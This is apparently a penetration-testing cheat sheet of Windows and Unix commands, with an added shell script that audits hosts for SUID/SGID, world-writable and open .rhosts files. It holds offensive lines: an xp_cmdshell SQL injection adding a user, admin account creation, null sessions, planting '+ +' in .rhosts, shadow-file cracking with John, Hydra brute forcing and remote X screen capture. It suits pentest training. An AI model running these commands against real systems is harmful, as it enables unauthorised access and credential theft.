CREST CheatSheet

This document provides information on commands and techniques for Windows and Linux/Unix systems. It covers topics such as viewing domain information, adding users, scanning SMB, viewing domain controllers, null sessions, password cracking, SSH key generation, X windows commands, SCP, finger, John the Ripper, Hydra, finding files, SUID/SGID programs, network services configuration, and network mapping. The document serves as a reference guide for penetration testing activities on Windows and Linux/Unix systems.

Windows -

Domain:                                                  Comment
net view                                                 list computers on domain
net view \\<target name/ip>                              list shares on host
net view /domain                                         list domains
net view /domain:<domain name>                           list computers on named domain
net user edward williams /add                            add a user
net localgroup Administrators edward /add                add to Administrators group
nbtscan 192.168.226.0/24                                 scan the subnet for SMB/NetBIOS hosts

Domain Controllers:                                      Comment
nltest /dclist:<domain name>                             list domain controllers
nltest /dsgetdc:<domain name> /pdc                       more PDC info
nltest /bdc_query:<domain name>                          BDC info (if any)
nltest /server:<ip> /trusted_domains                     needs a null (ipc$) session first

Hosts:                                                   Comment
net use \\<target>\ipc$ "" /u:""                         null session
nbtstat -a <name>  /  nbtstat -A <ip>                    NetBIOS name table and target MAC
epdump <target>                                          look for IPs in endpoints
enum -SUPc <target>                                      enumerate shares/users/password policy

SQL:                                                     Comment
';Exec xp_cmdshell 'net user <user> <passwd> /add';--    beware of password complexity issues
sp_configure 'show advanced options', 1                  set advanced options, then reconfigure
reconfigure                                              and run the next statement:
sp_configure 'xp_cmdshell', 1                            this will re-enable xp_cmdshell if it
reconfigure                                              has been turned off

Windows Misc:                                            Comment
dir filename /s                                          find file called filename in all subdirs
findstr /S /I "password" *.txt                           find all occurrences of password in text files
findstr /S /I /M "password" *.txt                        (just print the matching file names)
psexec \\192.168.0.1 -s cmd.exe                          null session first
Tasklist /?
Tasklist /svc                                            show the services hosted in each process
Tasklist /FI "USERNAME eq NT AUTHORITY\SYSTEM" /SVC      services running as SYSTEM

Then

Sc qc <servicename>                                      query the service configuration

Ed – CREST Notes
Linux / Unix -

NFS:                                                     Comment
showmount -e <target>                                    displays exports
sudo mount -t nfs <target>:/<export> <mount point>       don't forget to mkdir the mount point
adduser --uid <uid> --gid <gid> <username>               note the local password policy (6+ chars)
su - <user> and ssh-keygen                               switch user and generate keys for SSH


X:                                                       Comment
xwininfo -tree -root -display <ip>:0 | grep -i term      pipes back the hex id of the terminal window
xwd -root -display <ip>:0.0 | xwud                       capture the whole screen
xwd -id <hex value> -display <ip>:0 | xwud               capture the specified window
xkill -display <ip>:0                                    kill process/window
x-dumper.sh

SCP:                                                     Comment
scp file ed@ninja:/home/ed                               copy file to ninja
scp ed@ninja:/home/ed/file file                          copy file from ninja

PuTTY Copy:                                              Comment
pscp.exe <user>@<host>:/home/ed/Desktop/test.txt c:\     copy from SSH host to c:\

Finger:                                                  Comment
finger -l @target, 0@target, .@target, **@target         long list
finger (user, admin, ..)@target                          various flaws in finger
finger '1 2 3 4 5 6 7 8 9 0'@target                      Solaris 8 bug

R Services:                                              Comment
echo + + > /usr/bin/.rhosts                              look in users' home dirs; also check /etc/hosts.equiv

John:                                                    Comment
unshadow /etc/passwd /etc/shadow > file                  change /etc/john/john.conf to match the
john -i:mode file                                        minimum password requirements (incremental mode)
john --wordlist=words.txt file                           (wordlist mode)

hydra:                                                   Comment
hydra -e ns -l user -P words.txt -v <ip> smb             bash it

Unix Misc:                                               Comment
find . -type f -name '*payroll*' 2>/dev/null             Solaris: find file names (case sensitive)
find . -type f 2>/dev/null | grep -i 'Payroll'           Solaris: find file names (case insensitive)
find . -type f -exec grep -i -l 'Payroll' '{}' \; 2>/dev/null     Solaris: find file content
find / -type f -iname '*Payroll*' 2>/dev/null            Linux: find file names
grep -i -l -r whatever * 2>/dev/null                     Linux: find file contents
find / -type f -exec grep -i -l "password" '{}' \; 2>/dev/null    find files containing "password"
  or
grep -i -l 'password' *
find / -type f -print 2>/dev/null | grep -i "passwd"     Solaris: find file names, case insensitive
find / -type f \( -perm -04000 -o -perm -02000 \) 2>/dev/null     SUID / SGID (-o means "or")
find / -type f -perm -002 2>/dev/null                    world writable
showrev -p, uname -a, pkginfo -x                         Solaris patch info
netstat -nap                                             list processes and ports (needs sudo)
lsof -i :port
lsof -p <pid> -P                                         (-P gives port numbers)
ps -ef                                                   list processes
export PATH=$PATH:/whatever          (bash)              add to PATH in a bash/sh shell; valid for
PATH=$PATH:/whatever; export PATH    (sh)                the current terminal session only
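An added example, not part of Ed's notes, that wraps the SUID/SGID, world-writable and .rhosts checks from the Unix Misc and R Services sections into shell functions for auditing a host; the function names and the optional root-directory argument are assumptions.

```shell
#!/bin/sh
# Added audit helpers built around the find/grep one-liners in these notes.
# Function names and the optional root-directory argument are assumptions,
# not part of the original cheat sheet. Errors from unreadable paths are
# discarded with 2>/dev/null exactly as the notes do.

# SUID (04000) or SGID (02000) regular files; -o means "or", as in the notes.
# Prints one ls -ld line per hit so mode and owner are visible.
list_setid() {
    find "${1:-/}" -type f \( -perm -04000 -o -perm -02000 \) \
        -exec ls -ld {} \; 2>/dev/null
}

# World-writable regular files (-perm -002).
list_world_writable() {
    find "${1:-/}" -type f -perm -002 2>/dev/null
}

# .rhosts / hosts.equiv files containing the "+ +" wildcard (any host, any
# user), the entry the R Services section above says to look for.
list_open_rhosts() {
    find "${1:-/}" -type f \( -name .rhosts -o -name hosts.equiv \) 2>/dev/null |
    while IFS= read -r f; do
        if grep -Eq '^[[:space:]]*\+([[:space:]]+\+)?[[:space:]]*$' "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# Run all three checks and print a labelled report.
# Usage: . ./audit.sh && run_audit /   (defaults to / when no root is given)
run_audit() {
    root=${1:-/}
    printf '== SUID/SGID files under %s ==\n' "$root"
    list_setid "$root"
    printf '== world-writable files ==\n'
    list_world_writable "$root"
    printf '== rhosts/hosts.equiv trusting everyone ==\n'
    list_open_rhosts "$root"
}
```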

Network Mapping:                                         Comment
dig @<nameserver> <domain name> axfr                     zone transfer
traceroute <target>                                      default UDP (-I ICMP, -T TCP, default port 80)
ping -R <target>                                         record route, read from bottom up
